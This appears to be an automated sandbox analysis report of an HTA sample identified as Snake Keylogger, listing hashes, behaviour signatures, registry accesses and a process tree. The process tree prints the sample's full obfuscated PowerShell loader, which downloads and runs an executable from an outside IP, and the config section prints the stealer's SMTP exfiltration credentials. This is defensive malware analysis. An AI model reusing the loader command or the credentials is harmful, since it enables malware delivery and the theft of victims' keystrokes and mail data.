Analysis
-
max time kernel
117s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07-10-2024 01:54
Static task
static1
Behavioral task
behavioral1
Sample
bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef.hta
Resource
win10v2004-20240802-en
General
-
Target
bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef.hta
-
Size
150KB
-
MD5
25a0a6e379daa9cb5c68307fbf0857ea
-
SHA1
4c672a33a46b32584f00868c4b98d10187a91c3c
-
SHA256
bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef
-
SHA512
fb0bb7232df274cc07e30ec425e891e40cc105469e2aaf0f0d3843199c605f910a74690195a08ed1b269725ff13a48b927585d0f98a655743b0484ea8f652ee7
-
SSDEEP
48:7oa+ahWjz7eWLB2L64UKB3Rns4wKB3RnFWhWYYeecSr99DdokZGStBw04v4U1QYx:Ea+Cw7W3FNYfqffZUgAVT
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.purityontap.com - Port:
587 - Username:
[email protected] - Password:
mail55 - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/2636-29-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2636-31-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2636-30-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2472 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2472 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2844 taskhostw.exe -
Loads dropped DLL 1 IoCs
pid Process 2472 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00090000000173aa-22.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2844 set thread context of 2636 2844 taskhostw.exe 38 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhostw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2472 powershell.exe 2472 powershell.exe 2472 powershell.exe 2636 RegSvcs.exe 2636 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2844 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2472 powershell.exe Token: SeDebugPrivilege 2636 RegSvcs.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2272 wrote to memory of 2940 2272 mshta.exe 30 PID 2272 wrote to memory of 2940 2272 mshta.exe 30 PID 2272 wrote to memory of 2940 2272 mshta.exe 30 PID 2272 wrote to memory of 2940 2272 mshta.exe 30 PID 2940 wrote to memory of 2472 2940 cmd.exe 32 PID 2940 wrote to memory of 2472 2940 cmd.exe 32 PID 2940 wrote to memory of 2472 2940 cmd.exe 32 PID 2940 wrote to memory of 2472 2940 cmd.exe 32 PID 2472 wrote to memory of 2504 2472 powershell.exe 33 PID 2472 wrote to memory of 2504 2472 powershell.exe 33 PID 2472 wrote to memory of 2504 2472 powershell.exe 33 PID 2472 wrote to memory of 2504 2472 powershell.exe 33 PID 2504 wrote to memory of 2676 2504 csc.exe 34 PID 2504 wrote to memory of 2676 2504 csc.exe 34 PID 2504 wrote to memory of 2676 2504 csc.exe 34 PID 2504 wrote to memory of 2676 2504 csc.exe 34 PID 2472 wrote to memory of 2844 2472 powershell.exe 37 PID 2472 wrote to memory of 2844 2472 powershell.exe 37 PID 2472 wrote to memory of 2844 2472 powershell.exe 37 PID 2472 wrote to memory of 2844 2472 powershell.exe 37 PID 2844 wrote to memory of 2636 2844 taskhostw.exe 38 PID 2844 wrote to memory of 2636 2844 taskhostw.exe 38 PID 2844 wrote to memory of 2636 2844 taskhostw.exe 38 PID 2844 wrote to memory of 2636 2844 taskhostw.exe 38 PID 2844 wrote to memory of 2636 2844 taskhostw.exe 38 PID 2844 wrote to memory of 2636 2844 taskhostw.exe 38 PID 2844 wrote to memory of 2636 2844 taskhostw.exe 38 PID 2844 wrote to memory of 2636 2844 taskhostw.exe 38 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bdae25f01110b01f248c854d1ee715aa77d00342a7db6fe5cc06e085c07dfbef.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c pOweRShELl -eX ByPass -nOp -W 1 -C dEviCECreDENTIalDEpLoyMeNt ; ieX($(Iex('[sySTeM.texT.eNcOdiNg]'+[cHar]58+[cHaR]58+'uTF8.gEtStrInG([sYstEm.COnvErt]'+[CHAR]58+[CHAR]0x3a+'FRoMBaSe64sTRINg('+[Char]34+'JGREYTI1RmEwZ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNQmVSZEVGSU5JdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWXZIaWVyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFN0dWZyeFZEZ1IsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZNZGdweCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVa3JHUSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk1IckREdEtUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzd2FCbnIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGREYTI1RmEwZ0U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy45LzI0MC90YXNraG9zdHcuZXhlIiwiJEVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUiLDAsMCk7U3RhUlQtc0xFRVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOweRShELl -eX ByPass -nOp -W 1 -C dEviCECreDENTIalDEpLoyMeNt ; ieX($(Iex('[sySTeM.texT.eNcOdiNg]'+[cHar]58+[cHaR]58+'uTF8.gEtStrInG([sYstEm.COnvErt]'+[CHAR]58+[CHAR]0x3a+'FRoMBaSe64sTRINg('+[Char]34+'JGREYTI1RmEwZ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNQmVSZEVGSU5JdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWXZIaWVyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFN0dWZyeFZEZ1IsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZNZGdweCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVa3JHUSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk1IckREdEtUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzd2FCbnIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGREYTI1RmEwZ0U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy45LzI0MC90YXNraG9zdHcuZXhlIiwiJEVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUiLDAsMCk7U3RhUlQtc0xFRVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jtk9sg2l.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2504 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC5B0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC5AF.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2676
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostw.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostw.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2636
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b6ebb62625fd54d906c7d0787fa0e0ae
SHA1317d51f4b05b0ae8a5ba21d9c323167bf83e8cf1
SHA256ac91467226bfcc7ec199f4509b9bad99f02f05d46d839b990d84a8ede3d44060
SHA5124f3060b3b27ab9cd43bd4377892e0d4fcf1cc0fb2804519ab76790b563014038e6451ae09af3795276e987790cc054aead8d11a5a82b71c2910f8f80b1c4a947
-
Filesize
3KB
MD54309a3ed19f70034ccf41f7ea7f6e35c
SHA1b34ebe8ef85436cf21e3d77b1e673ed9d9c2a118
SHA256e28f8fc744a9c323b659a4b433a4e51622375795a7ad90235e4e954d8c0ef80d
SHA51249da216fcc424ac327737e7ffbb578c005d7f91be04f3a7ed6d29c3d0282335c21eeb7e8995b68859b21b077099e9e530f3707f6e3e056b43ed7ff274df0f479
-
Filesize
7KB
MD5034606a291399b39dac22939615faa33
SHA177b7f601b948b5b92cea5c739068b79d0bab5e4f
SHA2564fc9cfa3d949b5e03737cfbad4a72db283f29cf7027426d4fb406c7e77afc775
SHA512fe5f4a3fe3a3d0967340acb222fd3a159ec5d1469313b8fd7ab1177b14ad72f204c16992fc81225d04f4d092b2fff58c9a06a67bf0d228664affe045f4200fb7
-
Filesize
652B
MD56502f1e6421fba6da9bc1f2cb505750f
SHA1aa3695363fae491f66b17474abb65dd2f30dc6f7
SHA256a1569e2acc0791066089c9b0a28f1f67c5e893fbb9cddf5c2319d208b0d93094
SHA5120d6ed21bcf96343d1e722267a297e3e050fb563c61511b63a0c76a75caa61bdcb0da79d23d19db4bf3b39176078d86e97d599e30d3f3cf5da99526900782d532
-
Filesize
477B
MD53c2b912e8118e7163d3d05a557f13d2f
SHA18889f87c11a2fca2b363c3064d317447a29c5498
SHA256822f2e3e97f3d3f1d6a78969a3b8e502a2dd611a0bb9e1abccfd94f6faa22852
SHA5127aeb33879a1c6a8a639e65e4dab9076d2c0c03bb65e2883c342d35b3ae3cbcda8dc6158da09ded5d908193af173cb4c34014b0055b13c1ed9be74fb3fe896499
-
Filesize
309B
MD5243a99ee64772f6fcb34f92dbca5c43a
SHA16945fbceb92c05b80be6a8623ece41cc76d3b7be
SHA256b00823537cc8ae7af8903d172aca140a8ba5476bf031650c0af4c6242fc84839
SHA51295f3409c5a7fd5ff3c060a391ddda30dcd3dbe7aaafa28a4d7f0f3dbc2ee6e375f251a190c14bc313ad2047910f03cb2e5799ecc79cb6186381e1a0d8f911f39
-
Filesize
931KB
MD558ff14d476f2bbaab31b12587c09559e
SHA1ea9c7ce65a67f2a2d4e1ca4a2c3ac6785021fc94
SHA2561640e87780b219eba703c734e68b0f5cf793bc94fe0cdf9121658d12bb1f9364
SHA512a75d4bd80620a9441783131812780397fb0c3b1c6d6b9147d65ece23d9cc9384c148f6c491794cfbc012c290e3266e06a76357b84141b843929a295c2649613a